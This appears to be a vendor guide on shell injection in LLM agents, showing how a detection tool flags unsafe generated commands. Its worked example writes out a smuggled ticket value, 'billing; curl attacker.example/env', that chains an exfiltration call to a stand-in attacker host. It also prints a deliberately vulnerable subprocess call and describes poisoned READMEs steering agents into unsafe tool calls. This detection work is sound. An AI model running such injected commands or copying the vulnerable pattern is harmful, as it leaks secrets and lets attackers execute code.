What is shell injection in LLM systems?

Shell injection is an LLM security failure where untrusted user, model, or tool content is inserted into an operating-system command and changes what the shell executes.

How is shell injection different from prompt injection?

Prompt injection changes model instructions. Shell injection changes an operating-system command, often after a prompt-injection attack has steered an agent toward an unsafe tool call.

How do you measure shell injection?

Use FutureAGI's CommandInjectionDetector on generated command strings and review Agent Command Center post-guardrail blocks by route, tool, tenant, and trace ID.

What Is Shell Injection? FutureAGI Guide (2026)

What Is Shell Injection (LLM)?

Shell injection in an LLM system is a security failure where model, user, or tool output is placed into an operating-system command without strict validation, letting an attacker change what the shell executes. It is an LLM security risk in agent tools, code-generation workflows, terminal copilots, and production traces. FutureAGI surfaces it through eval:CommandInjectionDetector, so teams can score generated commands, block unsafe post-guardrail actions, and regression-test fixes before a command reaches infrastructure.

Why Shell Injection Matters in Production LLM and Agent Systems

Shell injection turns text generation into command execution. The dangerous pattern is usually simple: an agent builds a command string from user input, retrieved text, model output, or a tool result, then sends it to a shell. If the string contains ;, &&, |, backticks, $(), file redirection, or command substitution in the wrong place, the attacker can add a second operation. The named failure modes are remote command execution and destructive command chaining.

Developers feel the pain when a coding agent works in tests but emits unsafe shell fragments in edge cases. SREs see odd terminal-tool failures, unexpected outbound traffic, missing files, increased job retries, or token-heavy traces where the agent keeps repairing a broken command. Security teams need to prove whether a risky command was generated, blocked, executed, or copied into a human-run script. End users may only see the blast radius: deleted artifacts, leaked environment variables, or a support workflow that ran a command outside the request.

The risk is higher in 2026 multi-step agent stacks because the model no longer only writes prose. Agents run CI helpers, operate notebooks, call MCP tools, write deployment scripts, and pass terminal output into later steps. A prompt-injection message or poisoned README can become shell syntax three tool calls later, especially when the agent has a broad terminal.run tool and no command boundary check.

How FutureAGI Handles Shell Injection

FutureAGI anchors shell-injection review to the eval:CommandInjectionDetector surface. The inventory class is CommandInjectionDetector, a security detector for OS command injection vulnerabilities. In practice, engineers run it on generated scripts, terminal-tool arguments, notebook cells, CI commands, and agent traces that include proposed shell execution.

A realistic workflow starts with a code-repair agent instrumented through traceAI-langchain. A user asks it to inspect logs for a service name. The model proposes grep ${service_name} /var/log/app.log | tail -50, but the service name came from a ticket field containing billing; curl attacker.example/env. The trace records the user message, prompt version, route, agent.trajectory.step, tool.name, and the proposed command in tool.arguments.command. Before the terminal tool executes, Agent Command Center applies a post-guardrail that calls CommandInjectionDetector. A flagged command is blocked, the fallback asks for a sanitized service identifier, and the trace is added to a regression dataset.

FutureAGI’s approach is to score the command at the action boundary. Unlike a Semgrep scan that only sees committed code, FutureAGI can inspect model-generated commands, tool arguments, and production traces before a side effect happens. The engineer can then set a zero-tolerance release gate for high-risk shell execution, alert on detector failures by route, and replay confirmed attacks against new prompts, models, and tool policies.

How to Measure or Detect Shell Injection

Measure shell injection where commands are created and where they execute:

CommandInjectionDetector - detects OS command injection risk in generated code or command strings, including unsafe shell composition.
Trace fields - inspect agent.trajectory.step, tool.name, tool.arguments.command, route, prompt version, guardrail decision, and fallback reason.
Dashboard signals - track command-injection-fail-rate, post-guardrail-block-rate, terminal-tool-call rate, and confirmed-bypass count by tenant.
Runtime symptoms - watch for shell metacharacters in user-controlled slots, unexpected network calls, missing files, or commands that combine unrelated operations.
Feedback proxy - monitor escalation tickets where the agent ran a command the user did not request or produced an unsafe script for copy-paste.

from fi.evals import CommandInjectionDetector

code = 'subprocess.run("grep " + user_query, shell=True)'
detector = CommandInjectionDetector()
result = detector.evaluate(output=code)
print(result.score, result.reason)

Use thresholding by route. A sandboxed tutorial agent may warn and ask for confirmation, while a production deployment agent should block any high-confidence shell-injection finding before execution.

Common Mistakes

Building shell commands with string concatenation. Prefer argument arrays, allowlisted subcommands, and typed parameters instead of raw shell strings.
Checking only user input. Model output, retrieved files, issue titles, tool responses, and memory can all supply hostile command fragments.
Guarding before planning only. A prompt can look safe while the final tool.arguments.command is unsafe. Check the proposed action too.
Ignoring copy-paste scripts. A generated command shown to a developer can still execute in production if pasted into a terminal.
Treating escaping as the whole fix. Escaping helps, but privileged tools also need authorization, sandboxing, audit logs, and regression evals.